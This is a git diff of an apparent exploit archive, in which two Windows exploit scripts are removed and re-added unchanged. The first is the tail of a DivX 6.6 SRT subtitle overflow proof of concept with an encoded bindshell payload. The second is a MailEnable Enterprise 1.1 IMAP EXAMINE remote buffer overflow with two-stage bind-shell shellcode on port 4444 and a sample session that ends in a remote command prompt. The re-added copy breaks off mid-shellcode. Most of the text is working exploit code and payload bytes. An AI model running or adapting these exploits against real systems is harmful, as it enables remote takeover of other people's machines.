-"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D" -"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80" -"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56" -"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D" -"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40" -"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D" -"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80" -"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE" -"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D" -"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40" -"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D" -"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80" -"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58" -"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D" -"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40" -"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D" -"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80" -"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD" -"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D" -"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40" -"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D" -"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80" -"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74" -"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D" -"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40" -"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D" -"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80" -"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE" -"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D" 
-"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40" -"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D" -"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80" -"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A" -"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D" -"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40" -"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D" -"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80" -"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52" -"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D" -"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest) - -f=open(file,'w') -f.write("1 \n") -f.write("00:00:01,001 --> 00:00:02,001\n") -f.write(bindshell) -f.close() -print "DivX 6.6 SEH SRT Overflow - PoC\n"; -print "http://www.offensive-security.com/0day/divx66.py.txt\n"; -print "SRT has been created - ph33r \n"; - -# milw0rm.com [2008-04-18] +#!/usr/bin/python +####################################################################### +# DivX 6.6 SRT SEH overwrite PoC +# Tested on XP SP2 +# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD +# muts..at..offensive-security...dot..com +# chris..at..offensive-security...dot..com +# http://www.offensive-security.com/0day/divx66.py.txt +# Notes: Unicode buffer - real pita. +# Greetz to our wives - thanks for the couch! +####################################################################### +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. 
+#
+# C:\Documents and Settings\Administrator\Desktop>
+#######################################################################
+# file = name of avi video file
+file="infidel.srt"
+
+# Unicode friendly POP POP RET somewhere in DivX 6.6
+# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods
+
+ret="\x94\x48"
+
+# Align stack for register save
+nudge="\x48\x6d"
+
+# Payload building blocks
+
+buffer="\x41" * 1032
+
+xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop
+
+pushad="\x60\x6d" # Save stack registers,nop
+
+pushfd="\x9c\x6d"
+
+align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer
+
+align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd
+
+popfd="\x9D\x6D" # popfd,nop
+
+popad="\x61\x6D"# popad,nop
+
+padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode
+
+rest= "\x01" * 5000000 # Buffer and shellcode canvas
+
+# PoC Venetian Bindshell on port 4444 - ph33r
+# Built on alternating 00 01 surface
+# Venetian self decoding bindshell - 1580 bytes
+
+bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
+"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80"
+"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE"
+"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D"
+"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40"
+"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D"
+"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80"
+"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE"
+"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D"
+"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40"
+"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D"
+"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
+"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF" +"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D" +"\x40\x6D\x80\xBF\x6D\x40\x6D" +"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80" +"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2" +"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D" +"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40" +"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D" +"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80" +"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C" +"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D" +"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02" +"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D" +"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40" +"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D" +"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80" +"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F" +"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D" +"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40" +"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D" +"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80" +"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE" +"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D" +"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40" +"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D" +"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80" +"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67" +"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D" +"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40" 
+"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D" +"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80" +"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54" +"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D" +"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40" +"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D" +"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80" +"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52" +"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D" +"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40" +"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D" +"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80" +"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94" +"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D" +"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40" +"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D" +"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80" +"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3" +"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D" +"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40" +"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D" +"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80" +"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56" +"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D" +"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40" +"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D" +"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80" +"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE" +"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D" 
+"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40" +"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D" +"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80" +"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58" +"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D" +"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40" +"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D" +"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80" +"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD" +"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D" +"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40" +"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D" +"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80" +"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74" +"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D" +"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40" +"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D" +"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80" +"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE" +"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D" +"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40" +"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D" +"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80" +"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A" +"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D" +"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40" +"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D" +"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80" +"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52" 
+"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D" +"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest) + +f=open(file,'w') +f.write("1 \n") +f.write("00:00:01,001 --> 00:00:02,001\n") +f.write(bindshell) +f.close() +print "DivX 6.6 SEH SRT Overflow - PoC\n"; +print "http://www.offensive-security.com/0day/divx66.py.txt\n"; +print "SRT has been created - ph33r \n"; + +# milw0rm.com [2008-04-18] diff --git a/platforms/windows/remote/1378.py b/platforms/windows/remote/1378.py index 7ef9e8b8e..936feab9e 100755 --- a/platforms/windows/remote/1378.py +++ b/platforms/windows/remote/1378.py 
@@ -1,136 +1,136 @@
-#!/usr/bin/python
-############################################################
-#
-# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
-# Discovered and exploited by mati@see-security.com
-# This vulnerability affects Mailenable Enterprise 1.1
-# *without* the ME-10009.EXE patch.
-#
-# Details:
-# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
-# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
-# * No space for shellcode, so 1st stage shellcode is used to
-# jump back 512 bytes into the bindshell (2nd stage) shellcode.
-#
-# Thanks:
-# * My wife - for putting up with my obesssions
-# * Talz - for helping me out with the 1st stage shellcode
-#
-# FOR EDUCATION PURPOSES ONLY!
-############################################################
-# 1st stage shellcode:
-############################################################
-# [BITS 32]
-#
-# global _start
-#
-# _start:
-#
-# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
-#
-# ;--- copy eip into ecx
-# fldz
-# fnstenv [esp-12]
-# pop ecx
-# add cl, 10
-# nop
-# ;----------------------------------------------------------------------
-# dec ch ; ecx=-256;
-# dec ch ; ecx=-256;
-# jmp ecx ; lets jmp ecx (current location - 512)
-############################################################
-# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
-#
-# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
-# Discovered / Coded by mati@see-security.com
-#
-# [+] Connecting to 192.168.1.160
-# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
-# [+] Logging in as ftp
-# [+] a001 OK LOGIN completed
-# [+] Sending evil buffer...
-# [+] Done
-#
-# [+] Try connecting to port 4444 on victim IP - Muhahaha!
-#
-# root@slax:/tmp# nc -nv 192.168.1.160 4444
-# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
-# Microsoft Windows 2000 [Version 5.00.2195]
-# (C) Copyright 1985-2000 Microsoft Corp.
-#
-# C:\WINNT\system32>
-#####################################################
-
-import sys
-import struct
-import socket
-from time import sleep
-
-if len(sys.argv)!=5:
- print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
- print "\nDiscovered / Coded by mati@see-security.com\n"
- print "Usage: %s \n" %sys.argv[0]
- sys.exit(0)
-
-s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-
-# Return Address - Win2k SP4 jmp ebx
-returnaddress = "\x66\x4a\x4e\x7c"
-
-# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
-# First Stage Shellcode
-
-sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
-sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
-sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
-
-# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
-# Second Stage Shellcode
-
-sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa"
-sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5"
-sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1"
-sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3"
-sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02"
-sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1"
-sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1"
-sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a"
-sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa"
-sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28"
-sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79"
-sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb"
-sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42"
-sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63"
-sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d"
-sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a"
-sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07"
-sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5"
-sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b"
-sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa"
-sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a"
-sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a"
-
-buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc
-
-print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
-print "Discovered / Coded by mati@see-security.com\n"
-print "[+] Connecting to " + sys.argv[1]
-try:
- s.connect((sys.argv[1],int(sys.argv[2])))
-except:
- print "Could not connect to IMAP server!"
- sys.exit(0)
-
-data=s.recv(1024)
-print "[+] "+data.rstrip()
-print "[+] Logging in as %s" % sys.argv[3]
-s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n')
-data = s.recv(1024)
-print "[+] "+data.rstrip()
-print "[+] Sending evil buffer..."
-s.send('A001 EXAMINE ' + buffer+'\r\n')
-s.close()
-print "[+] Done\n"
-print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n"
-
-# milw0rm.com [2005-12-19]
+#!/usr/bin/python
+############################################################
+#
+# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
+# Discovered and exploited by mati@see-security.com
+# This vulnerability affects Mailenable Enterprise 1.1
+# *without* the ME-10009.EXE patch.
+#
+# Details:
+# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
+# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
+# * No space for shellcode, so 1st stage shellcode is used to
+# jump back 512 bytes into the bindshell (2nd stage) shellcode.
+#
+# Thanks:
+# * My wife - for putting up with my obesssions
+# * Talz - for helping me out with the 1st stage shellcode
+#
+# FOR EDUCATION PURPOSES ONLY!
+############################################################
+# 1st stage shellcode:
+############################################################
+# [BITS 32]
+#
+# global _start
+#
+# _start:
+#
+# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
+#
+# ;--- copy eip into ecx
+# fldz
+# fnstenv [esp-12]
+# pop ecx
+# add cl, 10
+# nop
+# ;----------------------------------------------------------------------
+# dec ch ; ecx=-256;
+# dec ch ; ecx=-256;
+# jmp ecx ; lets jmp ecx (current location - 512)
+############################################################
+# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
+#
+# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
+# Discovered / Coded by mati@see-security.com
+#
+# [+] Connecting to 192.168.1.160
+# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
+# [+] Logging in as ftp
+# [+] a001 OK LOGIN completed
+# [+] Sending evil buffer...
+# [+] Done
+#
+# [+] Try connecting to port 4444 on victim IP - Muhahaha!
+#
+# root@slax:/tmp# nc -nv 192.168.1.160 4444
+# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
+# Microsoft Windows 2000 [Version 5.00.2195]
+# (C) Copyright 1985-2000 Microsoft Corp.
+#
+# C:\WINNT\system32>
+#####################################################
+
+import sys
+import struct
+import socket
+from time import sleep
+
+if len(sys.argv)!=5:
+ print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
+ print "\nDiscovered / Coded by mati@see-security.com\n"
+ print "Usage: %s \n" %sys.argv[0]
+ sys.exit(0)
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+# Return Address - Win2k SP4 jmp ebx
+returnaddress = "\x66\x4a\x4e\x7c"
+
+# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
+# First Stage Shellcode
+
+sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
+sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
+sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
+
+# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
+# Second Stage Shellcode
+
+sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa"
+sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5"
+sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1"
+sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3"
+sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02"
+sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1"
+sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1"
+sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a"
